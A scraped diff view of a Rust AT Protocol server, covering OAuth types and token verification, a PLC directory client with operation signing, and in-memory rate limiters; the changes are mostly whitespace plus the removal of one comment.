let local = &email[..at_pos];
+27
src/oauth/types.rs
+27
src/oauth/types.rs
···
1
use chrono::{DateTime, Utc};
2
use serde::{Deserialize, Serialize};
3
use serde_json::Value as JsonValue;
4
#[derive(Debug, Clone, Serialize, Deserialize)]
5
pub struct RequestId(pub String);
6
#[derive(Debug, Clone, Serialize, Deserialize)]
7
pub struct TokenId(pub String);
8
#[derive(Debug, Clone, Serialize, Deserialize)]
9
pub struct DeviceId(pub String);
10
#[derive(Debug, Clone, Serialize, Deserialize)]
11
pub struct SessionId(pub String);
12
#[derive(Debug, Clone, Serialize, Deserialize)]
13
pub struct Code(pub String);
14
#[derive(Debug, Clone, Serialize, Deserialize)]
15
pub struct RefreshToken(pub String);
16
impl RequestId {
17
pub fn generate() -> Self {
18
Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4()))
19
}
20
}
21
impl TokenId {
22
pub fn generate() -> Self {
23
Self(uuid::Uuid::new_v4().to_string())
24
}
25
}
26
impl DeviceId {
27
pub fn generate() -> Self {
28
Self(uuid::Uuid::new_v4().to_string())
29
}
30
}
31
impl SessionId {
32
pub fn generate() -> Self {
33
Self(uuid::Uuid::new_v4().to_string())
34
}
35
}
36
impl Code {
37
pub fn generate() -> Self {
38
use rand::Rng;
···
43
))
44
}
45
}
46
impl RefreshToken {
47
pub fn generate() -> Self {
48
use rand::Rng;
···
53
))
54
}
55
}
56
#[derive(Debug, Clone, Serialize, Deserialize)]
57
#[serde(tag = "method")]
58
pub enum ClientAuth {
···
65
#[serde(rename = "private_key_jwt")]
66
PrivateKeyJwt { client_assertion: String },
67
}
68
#[derive(Debug, Clone, Serialize, Deserialize)]
69
pub struct AuthorizationRequestParameters {
70
pub response_type: String,
···
79
#[serde(flatten)]
80
pub extra: Option<JsonValue>,
81
}
82
#[derive(Debug, Clone)]
83
pub struct RequestData {
84
pub client_id: String,
···
89
pub device_id: Option<String>,
90
pub code: Option<String>,
91
}
92
#[derive(Debug, Clone)]
93
pub struct DeviceData {
94
pub session_id: String,
···
96
pub ip_address: String,
97
pub last_seen_at: DateTime<Utc>,
98
}
99
#[derive(Debug, Clone)]
100
pub struct TokenData {
101
pub did: String,
···
112
pub current_refresh_token: Option<String>,
113
pub scope: Option<String>,
114
}
115
#[derive(Debug, Clone, Serialize, Deserialize)]
116
pub struct AuthorizedClientData {
117
pub scope: Option<String>,
118
pub remember: bool,
119
}
120
#[derive(Debug, Clone, Serialize, Deserialize)]
121
pub struct OAuthClientMetadata {
122
pub client_id: String,
···
133
pub jwks_uri: Option<String>,
134
pub application_type: Option<String>,
135
}
136
#[derive(Debug, Clone, Serialize, Deserialize)]
137
pub struct ProtectedResourceMetadata {
138
pub resource: String,
···
141
pub scopes_supported: Vec<String>,
142
pub resource_documentation: Option<String>,
143
}
144
#[derive(Debug, Clone, Serialize, Deserialize)]
145
pub struct AuthorizationServerMetadata {
146
pub issuer: String,
···
159
pub dpop_signing_alg_values_supported: Option<Vec<String>>,
160
pub authorization_response_iss_parameter_supported: Option<bool>,
161
}
162
#[derive(Debug, Clone, Serialize, Deserialize)]
163
pub struct ParResponse {
164
pub request_uri: String,
165
pub expires_in: u64,
166
}
167
#[derive(Debug, Clone, Serialize, Deserialize)]
168
pub struct TokenResponse {
169
pub access_token: String,
···
176
#[serde(skip_serializing_if = "Option::is_none")]
177
pub sub: Option<String>,
178
}
179
#[derive(Debug, Clone, Serialize, Deserialize)]
180
pub struct TokenRequest {
181
pub grant_type: String,
···
186
pub client_id: Option<String>,
187
pub client_secret: Option<String>,
188
}
189
#[derive(Debug, Clone, Serialize, Deserialize)]
190
pub struct DPoPClaims {
191
pub jti: String,
···
197
#[serde(skip_serializing_if = "Option::is_none")]
198
pub nonce: Option<String>,
199
}
200
#[derive(Debug, Clone, Serialize, Deserialize)]
201
pub struct JwkPublicKey {
202
pub kty: String,
···
208
pub kid: Option<String>,
209
pub alg: Option<String>,
210
}
211
#[derive(Debug, Clone, Serialize, Deserialize)]
212
pub struct Jwks {
213
pub keys: Vec<JwkPublicKey>,
···
1
use chrono::{DateTime, Utc};
2
use serde::{Deserialize, Serialize};
3
use serde_json::Value as JsonValue;
4
+
5
#[derive(Debug, Clone, Serialize, Deserialize)]
6
pub struct RequestId(pub String);
7
+
8
#[derive(Debug, Clone, Serialize, Deserialize)]
9
pub struct TokenId(pub String);
10
+
11
#[derive(Debug, Clone, Serialize, Deserialize)]
12
pub struct DeviceId(pub String);
13
+
14
#[derive(Debug, Clone, Serialize, Deserialize)]
15
pub struct SessionId(pub String);
16
+
17
#[derive(Debug, Clone, Serialize, Deserialize)]
18
pub struct Code(pub String);
19
+
20
#[derive(Debug, Clone, Serialize, Deserialize)]
21
pub struct RefreshToken(pub String);
22
+
23
impl RequestId {
24
pub fn generate() -> Self {
25
Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4()))
26
}
27
}
28
+
29
impl TokenId {
30
pub fn generate() -> Self {
31
Self(uuid::Uuid::new_v4().to_string())
32
}
33
}
34
+
35
impl DeviceId {
36
pub fn generate() -> Self {
37
Self(uuid::Uuid::new_v4().to_string())
38
}
39
}
40
+
41
impl SessionId {
42
pub fn generate() -> Self {
43
Self(uuid::Uuid::new_v4().to_string())
44
}
45
}
46
+
47
impl Code {
48
pub fn generate() -> Self {
49
use rand::Rng;
···
54
))
55
}
56
}
57
+
58
impl RefreshToken {
59
pub fn generate() -> Self {
60
use rand::Rng;
···
65
))
66
}
67
}
68
+
69
#[derive(Debug, Clone, Serialize, Deserialize)]
70
#[serde(tag = "method")]
71
pub enum ClientAuth {
···
78
#[serde(rename = "private_key_jwt")]
79
PrivateKeyJwt { client_assertion: String },
80
}
81
+
82
#[derive(Debug, Clone, Serialize, Deserialize)]
83
pub struct AuthorizationRequestParameters {
84
pub response_type: String,
···
93
#[serde(flatten)]
94
pub extra: Option<JsonValue>,
95
}
96
+
97
#[derive(Debug, Clone)]
98
pub struct RequestData {
99
pub client_id: String,
···
104
pub device_id: Option<String>,
105
pub code: Option<String>,
106
}
107
+
108
#[derive(Debug, Clone)]
109
pub struct DeviceData {
110
pub session_id: String,
···
112
pub ip_address: String,
113
pub last_seen_at: DateTime<Utc>,
114
}
115
+
116
#[derive(Debug, Clone)]
117
pub struct TokenData {
118
pub did: String,
···
129
pub current_refresh_token: Option<String>,
130
pub scope: Option<String>,
131
}
132
+
133
#[derive(Debug, Clone, Serialize, Deserialize)]
134
pub struct AuthorizedClientData {
135
pub scope: Option<String>,
136
pub remember: bool,
137
}
138
+
139
#[derive(Debug, Clone, Serialize, Deserialize)]
140
pub struct OAuthClientMetadata {
141
pub client_id: String,
···
152
pub jwks_uri: Option<String>,
153
pub application_type: Option<String>,
154
}
155
+
156
#[derive(Debug, Clone, Serialize, Deserialize)]
157
pub struct ProtectedResourceMetadata {
158
pub resource: String,
···
161
pub scopes_supported: Vec<String>,
162
pub resource_documentation: Option<String>,
163
}
164
+
165
#[derive(Debug, Clone, Serialize, Deserialize)]
166
pub struct AuthorizationServerMetadata {
167
pub issuer: String,
···
180
pub dpop_signing_alg_values_supported: Option<Vec<String>>,
181
pub authorization_response_iss_parameter_supported: Option<bool>,
182
}
183
+
184
#[derive(Debug, Clone, Serialize, Deserialize)]
185
pub struct ParResponse {
186
pub request_uri: String,
187
pub expires_in: u64,
188
}
189
+
190
#[derive(Debug, Clone, Serialize, Deserialize)]
191
pub struct TokenResponse {
192
pub access_token: String,
···
199
#[serde(skip_serializing_if = "Option::is_none")]
200
pub sub: Option<String>,
201
}
202
+
203
#[derive(Debug, Clone, Serialize, Deserialize)]
204
pub struct TokenRequest {
205
pub grant_type: String,
···
210
pub client_id: Option<String>,
211
pub client_secret: Option<String>,
212
}
213
+
214
#[derive(Debug, Clone, Serialize, Deserialize)]
215
pub struct DPoPClaims {
216
pub jti: String,
···
222
#[serde(skip_serializing_if = "Option::is_none")]
223
pub nonce: Option<String>,
224
}
225
+
226
#[derive(Debug, Clone, Serialize, Deserialize)]
227
pub struct JwkPublicKey {
228
pub kty: String,
···
234
pub kid: Option<String>,
235
pub alg: Option<String>,
236
}
237
+
238
#[derive(Debug, Clone, Serialize, Deserialize)]
239
pub struct Jwks {
240
pub keys: Vec<JwkPublicKey>,
+14
src/oauth/verify.rs
+14
src/oauth/verify.rs
···
10
use sha2::Sha256;
11
use sqlx::PgPool;
12
use subtle::ConstantTimeEq;
13
use crate::config::AuthConfig;
14
use crate::state::AppState;
15
use super::db;
16
use super::dpop::DPoPVerifier;
17
use super::OAuthError;
18
pub struct OAuthTokenInfo {
19
pub did: String,
20
pub token_id: String,
···
22
pub scope: Option<String>,
23
pub dpop_jkt: Option<String>,
24
}
25
pub struct VerifyResult {
26
pub did: String,
27
pub token_id: String,
28
pub client_id: String,
29
pub scope: Option<String>,
30
}
31
pub async fn verify_oauth_access_token(
32
pool: &PgPool,
33
access_token: &str,
···
69
scope: token_data.scope,
70
})
71
}
72
pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> {
73
let parts: Vec<&str> = token.split('.').collect();
74
if parts.len() != 3 {
···
141
dpop_jkt,
142
})
143
}
144
fn compute_ath(access_token: &str) -> String {
145
use sha2::Digest;
146
let mut hasher = Sha256::new();
···
148
let hash = hasher.finalize();
149
URL_SAFE_NO_PAD.encode(&hash)
150
}
151
pub fn generate_dpop_nonce() -> String {
152
let config = AuthConfig::get();
153
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
154
verifier.generate_nonce()
155
}
156
pub struct OAuthUser {
157
pub did: String,
158
pub client_id: Option<String>,
159
pub scope: Option<String>,
160
pub is_oauth: bool,
161
}
162
pub struct OAuthAuthError {
163
pub status: StatusCode,
164
pub error: String,
165
pub message: String,
166
pub dpop_nonce: Option<String>,
167
}
168
impl IntoResponse for OAuthAuthError {
169
fn into_response(self) -> Response {
170
let mut response = (
···
184
response
185
}
186
}
187
impl FromRequestParts<AppState> for OAuthUser {
188
type Rejection = OAuthAuthError;
189
async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> {
190
let auth_header = parts
191
.headers
···
258
}
259
}
260
}
261
struct LegacyAuthResult {
262
did: String,
263
}
264
async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> {
265
match crate::auth::validate_bearer_token(pool, token).await {
266
Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
···
10
use sha2::Sha256;
11
use sqlx::PgPool;
12
use subtle::ConstantTimeEq;
13
+
14
use crate::config::AuthConfig;
15
use crate::state::AppState;
16
use super::db;
17
use super::dpop::DPoPVerifier;
18
use super::OAuthError;
19
+
20
pub struct OAuthTokenInfo {
21
pub did: String,
22
pub token_id: String,
···
24
pub scope: Option<String>,
25
pub dpop_jkt: Option<String>,
26
}
27
+
28
pub struct VerifyResult {
29
pub did: String,
30
pub token_id: String,
31
pub client_id: String,
32
pub scope: Option<String>,
33
}
34
+
35
pub async fn verify_oauth_access_token(
36
pool: &PgPool,
37
access_token: &str,
···
73
scope: token_data.scope,
74
})
75
}
76
+
77
pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> {
78
let parts: Vec<&str> = token.split('.').collect();
79
if parts.len() != 3 {
···
146
dpop_jkt,
147
})
148
}
149
+
150
fn compute_ath(access_token: &str) -> String {
151
use sha2::Digest;
152
let mut hasher = Sha256::new();
···
154
let hash = hasher.finalize();
155
URL_SAFE_NO_PAD.encode(&hash)
156
}
157
+
158
pub fn generate_dpop_nonce() -> String {
159
let config = AuthConfig::get();
160
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
161
verifier.generate_nonce()
162
}
163
+
164
pub struct OAuthUser {
165
pub did: String,
166
pub client_id: Option<String>,
167
pub scope: Option<String>,
168
pub is_oauth: bool,
169
}
170
+
171
pub struct OAuthAuthError {
172
pub status: StatusCode,
173
pub error: String,
174
pub message: String,
175
pub dpop_nonce: Option<String>,
176
}
177
+
178
impl IntoResponse for OAuthAuthError {
179
fn into_response(self) -> Response {
180
let mut response = (
···
194
response
195
}
196
}
197
+
198
impl FromRequestParts<AppState> for OAuthUser {
199
type Rejection = OAuthAuthError;
200
+
201
async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> {
202
let auth_header = parts
203
.headers
···
270
}
271
}
272
}
273
+
274
struct LegacyAuthResult {
275
did: String,
276
}
277
+
278
async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> {
279
match crate::auth::validate_bearer_token(pool, token).await {
280
Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
+30
src/plc/mod.rs
+30
src/plc/mod.rs
···
8
use std::collections::HashMap;
9
use std::time::Duration;
10
use thiserror::Error;
11
#[derive(Error, Debug)]
12
pub enum PlcError {
13
#[error("HTTP request failed: {0}")]
···
27
#[error("Service unavailable (circuit breaker open)")]
28
CircuitBreakerOpen,
29
}
30
#[derive(Debug, Clone, Serialize, Deserialize)]
31
pub struct PlcOperation {
32
#[serde(rename = "type")]
···
42
#[serde(skip_serializing_if = "Option::is_none")]
43
pub sig: Option<String>,
44
}
45
#[derive(Debug, Clone, Serialize, Deserialize)]
46
pub struct PlcService {
47
#[serde(rename = "type")]
48
pub service_type: String,
49
pub endpoint: String,
50
}
51
#[derive(Debug, Clone, Serialize, Deserialize)]
52
pub struct PlcTombstone {
53
#[serde(rename = "type")]
···
56
#[serde(skip_serializing_if = "Option::is_none")]
57
pub sig: Option<String>,
58
}
59
#[derive(Debug, Clone, Serialize, Deserialize)]
60
#[serde(untagged)]
61
pub enum PlcOpOrTombstone {
62
Operation(PlcOperation),
63
Tombstone(PlcTombstone),
64
}
65
impl PlcOpOrTombstone {
66
pub fn is_tombstone(&self) -> bool {
67
match self {
···
70
}
71
}
72
}
73
pub struct PlcClient {
74
base_url: String,
75
client: Client,
76
}
77
impl PlcClient {
78
pub fn new(base_url: Option<String>) -> Self {
79
let base_url = base_url.unwrap_or_else(|| {
···
99
client,
100
}
101
}
102
fn encode_did(did: &str) -> String {
103
urlencoding::encode(did).to_string()
104
}
105
pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> {
106
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
107
let response = self.client.get(&url).send().await?;
···
118
}
119
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
120
}
121
pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> {
122
let url = format!("{}/{}/data", self.base_url, Self::encode_did(did));
123
let response = self.client.get(&url).send().await?;
···
134
}
135
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
136
}
137
pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> {
138
let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did));
139
let response = self.client.get(&url).send().await?;
···
150
}
151
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
152
}
153
pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> {
154
let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did));
155
let response = self.client.get(&url).send().await?;
···
166
}
167
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
168
}
169
pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> {
170
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
171
let response = self.client
···
184
Ok(())
185
}
186
}
187
pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> {
188
let cbor_bytes = serde_ipld_dagcbor::to_vec(value)
189
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
195
let cid = cid::Cid::new_v1(0x71, multihash);
196
Ok(cid.to_string())
197
}
198
pub fn sign_operation(
199
operation: &Value,
200
signing_key: &SigningKey,
···
213
}
214
Ok(op)
215
}
216
pub fn create_update_op(
217
last_op: &PlcOpOrTombstone,
218
rotation_keys: Option<Vec<String>>,
···
250
};
251
serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string()))
252
}
253
pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
254
let verifying_key = signing_key.verifying_key();
255
let point = verifying_key.to_encoded_point(true);
···
259
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
260
format!("did:key:{}", encoded)
261
}
262
pub struct GenesisResult {
263
pub did: String,
264
pub signed_operation: Value,
265
}
266
pub fn create_genesis_operation(
267
signing_key: &SigningKey,
268
rotation_key: &str,
···
298
signed_operation: signed_op,
299
})
300
}
301
pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> {
302
let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op)
303
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
308
let truncated = &encoded[..24];
309
Ok(format!("did:plc:{}", truncated))
310
}
311
pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
312
let obj = op.as_object()
313
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
···
336
}
337
Ok(())
338
}
339
pub struct PlcValidationContext {
340
pub server_rotation_key: String,
341
pub expected_signing_key: String,
342
pub expected_handle: String,
343
pub expected_pds_endpoint: String,
344
}
345
pub fn validate_plc_operation_for_submission(
346
op: &Value,
347
ctx: &PlcValidationContext,
···
407
}
408
Ok(())
409
}
410
pub fn verify_operation_signature(
411
op: &Value,
412
rotation_keys: &[String],
···
434
}
435
Ok(false)
436
}
437
fn verify_signature_with_did_key(
438
did_key: &str,
439
message: &[u8],
···
461
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
462
Ok(verifying_key.verify(message, signature).is_ok())
463
}
464
#[cfg(test)]
465
mod tests {
466
use super::*;
467
#[test]
468
fn test_signing_key_to_did_key() {
469
let key = SigningKey::random(&mut rand::thread_rng());
470
let did_key = signing_key_to_did_key(&key);
471
assert!(did_key.starts_with("did:key:z"));
472
}
473
#[test]
474
fn test_cid_for_cbor() {
475
let value = json!({
···
479
let cid = cid_for_cbor(&value).unwrap();
480
assert!(cid.starts_with("bafyrei"));
481
}
482
#[test]
483
fn test_sign_operation() {
484
let key = SigningKey::random(&mut rand::thread_rng());
···
8
use std::collections::HashMap;
9
use std::time::Duration;
10
use thiserror::Error;
11
+
12
#[derive(Error, Debug)]
13
pub enum PlcError {
14
#[error("HTTP request failed: {0}")]
···
28
#[error("Service unavailable (circuit breaker open)")]
29
CircuitBreakerOpen,
30
}
31
+
32
#[derive(Debug, Clone, Serialize, Deserialize)]
33
pub struct PlcOperation {
34
#[serde(rename = "type")]
···
44
#[serde(skip_serializing_if = "Option::is_none")]
45
pub sig: Option<String>,
46
}
47
+
48
#[derive(Debug, Clone, Serialize, Deserialize)]
49
pub struct PlcService {
50
#[serde(rename = "type")]
51
pub service_type: String,
52
pub endpoint: String,
53
}
54
+
55
#[derive(Debug, Clone, Serialize, Deserialize)]
56
pub struct PlcTombstone {
57
#[serde(rename = "type")]
···
60
#[serde(skip_serializing_if = "Option::is_none")]
61
pub sig: Option<String>,
62
}
63
+
64
#[derive(Debug, Clone, Serialize, Deserialize)]
65
#[serde(untagged)]
66
pub enum PlcOpOrTombstone {
67
Operation(PlcOperation),
68
Tombstone(PlcTombstone),
69
}
70
+
71
impl PlcOpOrTombstone {
72
pub fn is_tombstone(&self) -> bool {
73
match self {
···
76
}
77
}
78
}
79
+
80
pub struct PlcClient {
81
base_url: String,
82
client: Client,
83
}
84
+
85
impl PlcClient {
86
pub fn new(base_url: Option<String>) -> Self {
87
let base_url = base_url.unwrap_or_else(|| {
···
107
client,
108
}
109
}
110
+
111
fn encode_did(did: &str) -> String {
112
urlencoding::encode(did).to_string()
113
}
114
+
115
pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> {
116
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
117
let response = self.client.get(&url).send().await?;
···
128
}
129
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
130
}
131
+
132
pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> {
133
let url = format!("{}/{}/data", self.base_url, Self::encode_did(did));
134
let response = self.client.get(&url).send().await?;
···
145
}
146
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
147
}
148
+
149
pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> {
150
let url = format!("{}/{}/log/last", self.base_url, Self::encode_did(did));
151
let response = self.client.get(&url).send().await?;
···
162
}
163
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
164
}
165
+
166
pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> {
167
let url = format!("{}/{}/log/audit", self.base_url, Self::encode_did(did));
168
let response = self.client.get(&url).send().await?;
···
179
}
180
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
181
}
182
+
183
pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> {
184
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
185
let response = self.client
···
198
Ok(())
199
}
200
}
201
+
202
pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> {
203
let cbor_bytes = serde_ipld_dagcbor::to_vec(value)
204
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
210
let cid = cid::Cid::new_v1(0x71, multihash);
211
Ok(cid.to_string())
212
}
213
+
214
pub fn sign_operation(
215
operation: &Value,
216
signing_key: &SigningKey,
···
229
}
230
Ok(op)
231
}
232
+
233
pub fn create_update_op(
234
last_op: &PlcOpOrTombstone,
235
rotation_keys: Option<Vec<String>>,
···
267
};
268
serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string()))
269
}
270
+
271
pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
272
let verifying_key = signing_key.verifying_key();
273
let point = verifying_key.to_encoded_point(true);
···
277
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
278
format!("did:key:{}", encoded)
279
}
280
+
281
pub struct GenesisResult {
282
pub did: String,
283
pub signed_operation: Value,
284
}
285
+
286
pub fn create_genesis_operation(
287
signing_key: &SigningKey,
288
rotation_key: &str,
···
318
signed_operation: signed_op,
319
})
320
}
321
+
322
pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> {
323
let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op)
324
.map_err(|e| PlcError::Serialization(e.to_string()))?;
···
329
let truncated = &encoded[..24];
330
Ok(format!("did:plc:{}", truncated))
331
}
332
+
333
pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
334
let obj = op.as_object()
335
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
···
358
}
359
Ok(())
360
}
361
+
362
pub struct PlcValidationContext {
363
pub server_rotation_key: String,
364
pub expected_signing_key: String,
365
pub expected_handle: String,
366
pub expected_pds_endpoint: String,
367
}
368
+
369
pub fn validate_plc_operation_for_submission(
370
op: &Value,
371
ctx: &PlcValidationContext,
···
431
}
432
Ok(())
433
}
434
+
435
pub fn verify_operation_signature(
436
op: &Value,
437
rotation_keys: &[String],
···
459
}
460
Ok(false)
461
}
462
+
463
fn verify_signature_with_did_key(
464
did_key: &str,
465
message: &[u8],
···
487
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
488
Ok(verifying_key.verify(message, signature).is_ok())
489
}
490
+
491
#[cfg(test)]
492
mod tests {
493
use super::*;
494
+
495
#[test]
496
fn test_signing_key_to_did_key() {
497
let key = SigningKey::random(&mut rand::thread_rng());
498
let did_key = signing_key_to_did_key(&key);
499
assert!(did_key.starts_with("did:key:z"));
500
}
501
+
502
#[test]
503
fn test_cid_for_cbor() {
504
let value = json!({
···
508
let cid = cid_for_cbor(&value).unwrap();
509
assert!(cid.starts_with("bafyrei"));
510
}
511
+
512
#[test]
513
fn test_sign_operation() {
514
let key = SigningKey::random(&mut rand::thread_rng());
+34
-5
src/rate_limit.rs
+34
-5
src/rate_limit.rs
···
16
num::NonZeroU32,
17
sync::Arc,
18
};
19
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
20
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
21
-
// NOTE: For production deployments with high traffic, prefer using the distributed rate
22
-
// limiter (Redis/Valkey-based) via AppState::distributed_rate_limiter. The in-memory
23
-
// rate limiters here don't automatically clean up expired entries, which can cause
24
-
// memory growth over time with many unique client IPs. The distributed rate limiter
25
-
// uses Redis TTL for automatic cleanup and works correctly across multiple instances.
26
#[derive(Clone)]
27
pub struct RateLimiters {
28
pub login: Arc<KeyedRateLimiter>,
···
37
pub app_password: Arc<KeyedRateLimiter>,
38
pub email_update: Arc<KeyedRateLimiter>,
39
}
40
impl Default for RateLimiters {
41
fn default() -> Self {
42
Self::new()
43
}
44
}
45
impl RateLimiters {
46
pub fn new() -> Self {
47
Self {
···
80
)),
81
}
82
}
83
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
84
self.login = Arc::new(RateLimiter::keyed(
85
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
86
));
87
self
88
}
89
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
90
self.oauth_token = Arc::new(RateLimiter::keyed(
91
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
92
));
93
self
94
}
95
pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self {
96
self.oauth_authorize = Arc::new(RateLimiter::keyed(
97
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
98
));
99
self
100
}
101
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
102
self.password_reset = Arc::new(RateLimiter::keyed(
103
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
104
));
105
self
106
}
107
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
108
self.account_creation = Arc::new(RateLimiter::keyed(
109
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
110
));
111
self
112
}
113
pub fn with_email_update_limit(mut self, per_hour: u32) -> Self {
114
self.email_update = Arc::new(RateLimiter::keyed(
115
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
···
117
self
118
}
119
}
120
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
121
if let Some(forwarded) = headers.get("x-forwarded-for") {
122
if let Ok(value) = forwarded.to_str() {
···
125
}
126
}
127
}
128
if let Some(real_ip) = headers.get("x-real-ip") {
129
if let Ok(value) = real_ip.to_str() {
130
return value.trim().to_string();
131
}
132
}
133
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
134
}
135
fn rate_limit_response() -> Response {
136
(
137
StatusCode::TOO_MANY_REQUESTS,
···
142
)
143
.into_response()
144
}
145
pub async fn login_rate_limit(
146
ConnectInfo(addr): ConnectInfo<SocketAddr>,
147
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
149
next: Next,
150
) -> Response {
151
let client_ip = extract_client_ip(request.headers(), Some(addr));
152
if limiters.login.check_key(&client_ip).is_err() {
153
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
154
return rate_limit_response();
155
}
156
next.run(request).await
157
}
158
pub async fn oauth_token_rate_limit(
159
ConnectInfo(addr): ConnectInfo<SocketAddr>,
160
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
162
next: Next,
163
) -> Response {
164
let client_ip = extract_client_ip(request.headers(), Some(addr));
165
if limiters.oauth_token.check_key(&client_ip).is_err() {
166
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
167
return rate_limit_response();
168
}
169
next.run(request).await
170
}
171
pub async fn password_reset_rate_limit(
172
ConnectInfo(addr): ConnectInfo<SocketAddr>,
173
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
175
next: Next,
176
) -> Response {
177
let client_ip = extract_client_ip(request.headers(), Some(addr));
178
if limiters.password_reset.check_key(&client_ip).is_err() {
179
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
180
return rate_limit_response();
181
}
182
next.run(request).await
183
}
184
pub async fn account_creation_rate_limit(
185
ConnectInfo(addr): ConnectInfo<SocketAddr>,
186
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
188
next: Next,
189
) -> Response {
190
let client_ip = extract_client_ip(request.headers(), Some(addr));
191
if limiters.account_creation.check_key(&client_ip).is_err() {
192
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
193
return rate_limit_response();
194
}
195
next.run(request).await
196
}
197
#[cfg(test)]
198
mod tests {
199
use super::*;
200
#[test]
201
fn test_rate_limiters_creation() {
202
let limiters = RateLimiters::new();
203
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
204
}
205
#[test]
206
fn test_rate_limiter_exhaustion() {
207
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
208
let key = "test_ip".to_string();
209
assert!(limiter.check_key(&key).is_ok());
210
assert!(limiter.check_key(&key).is_ok());
211
assert!(limiter.check_key(&key).is_err());
212
}
213
#[test]
214
fn test_different_keys_have_separate_limits() {
215
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
216
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
217
assert!(limiter.check_key(&"ip1".to_string()).is_err());
218
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
219
}
220
#[test]
221
fn test_builder_pattern() {
222
let limiters = RateLimiters::new()
···
